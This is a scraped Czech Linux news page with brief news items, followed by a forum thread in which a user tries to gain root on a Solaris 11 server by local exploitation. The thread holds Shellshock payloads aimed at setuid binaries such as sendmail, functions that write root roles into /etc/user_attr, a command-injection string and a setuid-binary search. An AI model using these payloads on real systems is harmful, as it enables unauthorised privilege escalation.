Příspěvek na blogu Ubuntu upozorňuje na několik zranitelnosti v rozšíření Linuxu o mandatorní řízení přístupu AppArmor. Společně jsou označovány jako CrackArmor. Objevila je společnost Qualys (technické detaily). Neprivilegovaný lokální uživatel se může stát rootem. Chyba existuje od roku 2017. Doporučuje se okamžitá aktualizace.
Byla vydána nová verze 19 integrovaného vývojového prostředí (IDE) Qt Creator. Podrobný přehled novinek v changelogu.
Bitwig Studio (Wikipedie) bylo vydáno ve verzi 6. Jedná se o proprietární multiplatformní (macOS, Windows, Linux) digitální pracovní stanici pro práci s audiem (DAW).
Společnost Igalia představila novou linuxovou distribuci (framework) s názvem Moonforge. Jedná se o distribuci určenou pro vestavěné systémy. Vychází z projektů Yocto a OpenEmbedded.
Google Chrome 146 byl prohlášen za stabilní. Nejnovější stabilní verze 146.0.7680.71 přináší řadu novinek z hlediska uživatelů i vývojářů. Podrobný přehled v poznámkách k vydání. Opraveno bylo 29 bezpečnostních chyb. Vylepšeny byly také nástroje pro vývojáře.
D7VK byl vydán ve verzi 1.5. Jedná se o fork DXVK implementující překlad volání Direct3D 3 (novinka), 5, 6 a 7 na Vulkan. DXVK zvládá Direct3D 8, 9, 10 a 11.
Bylo vydáno Eclipse IDE 2026-03 aneb Eclipse 4.39. Představení novinek tohoto integrovaného vývojového prostředí také na YouTube.
Ze systému Slavia pojišťovny uniklo přibližně 150 gigabajtů citlivých dat. Jedná se například o pojistné dokumenty, lékařské záznamy nebo přímou komunikaci s klienty. Za únik může chyba dodavatelské společnosti.
Sněmovna propustila do dalšího kola projednávání vládní návrh zákona o digitální ekonomice, který má přinést bezpečnější on-line prostředí. Reaguje na evropské nařízení DSA o digitálních službách a upravuje třeba pravidla pro on-line tržiště nebo sociální sítě a má i víc chránit děti.
Meta převezme sociální síť pro umělou inteligenci (AI) Moltbook. Tvůrci Moltbooku – Matt Schlicht a Ben Parr – se díky dohodě stanou součástí Meta Superintelligence Labs (MSL). Meta MSL založila s cílem sjednotit své aktivity na poli AI a vyvinout takovou umělou inteligenci, která překoná lidské schopnosti v mnoha oblastech. Fungovat by měla ne jako centralizovaný nástroj, ale jako osobní asistent pro každého uživatele.
$ mojefunkce() {
> usermod -R root user
> }
$ export -f mojefunkce
find / -perm -04000 -o -perm -2000 2>/dev/nullTakto sa dozvies ake mas binarky k dispozicii. A podla toho hladat, ci neexistuje nieco, co malo dieru a da sa exploitnut.
$ env asd='() { :;}; id ' /path/to/setuid_setgid/binary
Neviem ci existuje nejaky local exploit na solaris 11 na tvoje aktualne SRU, skus hladat cez "solaris 11 local exploit".
localhost; /bin/sh ; , pripadne zistit ci sa nerobi escape cez uvodzovky.
$ env asd='() { :;}; id ' /path/to/setuid_setgid/binary tak jednoduše nefunguje...
smmsp@solaris11:~$ grep smmsp /etc/passwd smmsp:x:25:25:SendMail Message Submission Program:/: smmsp@solaris11:~$ echo $SHELL /usr/bin/sh
$ injection() {
> echo "user::::type=role" >> /etc/user_attr
> }
$ export -f injection
Teď se snažím z mého shellu spustit další shell pod rootem a z něj pomocí parsovacího bugu spustit funkci, bohužel se mi nedaří:
user@server-to-hack:~$ env asd='() { :;}; injection ' /usr/lib/sendmail
env asd='() { :;}; injection ' /usr/lib/sendmail
Recipient names must be specified
^C
user@server-to-hack:~$ env asd='() { :;}; injection ' /usr/lib/sendmail user
env asd='() { :;}; injection ' /usr/lib/sendmail user
nic se nestane...
Kdyby měl někdo nějaký další tip budu moc rád. S přístupem do serverovny se to má prostě tak, že zákazník vyhodil všechny lidi co tam měli povolen přístup a teď už cca půl roku "řeší" jak vyměnit to ILO. Je to prostě klasický bordel, předpokládám že někteří z vás ví očem tady píšu... Hacknout ten server z localhostu je pro mě asi opravdu nejrychlejší řešení. :)
---
To check for the CVE-2014-6271 vulnerability
user@server-to-hack:~$ env var='() { ignore this;}; echo vulnerable' bash -c /bin/true
vulnerable
---
user@server-to-hack:~$ bash --version bash --version GNU bash, version 4.1.11(2)-release (sparc-sun-solaris2.11)---
Publisher: solaris
Version: 0.5.11 (Oracle Solaris 11.1 SRU 1.4)
Build Release: 5.11
Branch: 0.175.1.1.0.4.0
Packaging Date: November 6, 2012 12:13:44 AM
---
user@server-to-hack:~$ X='() { (a)=>\' bash -c "echo date"
bash: X: line 1: syntax error near unexpected token `='
bash: X: line 1: `'
bash: error importing function definition for `X'
user@server-to-hack:~$ cat echo
Friday, May 13, 2016 03:51:13 PM EEST
-> cd SP/console
/SP/console
-> start
Tiskni
Sdílej: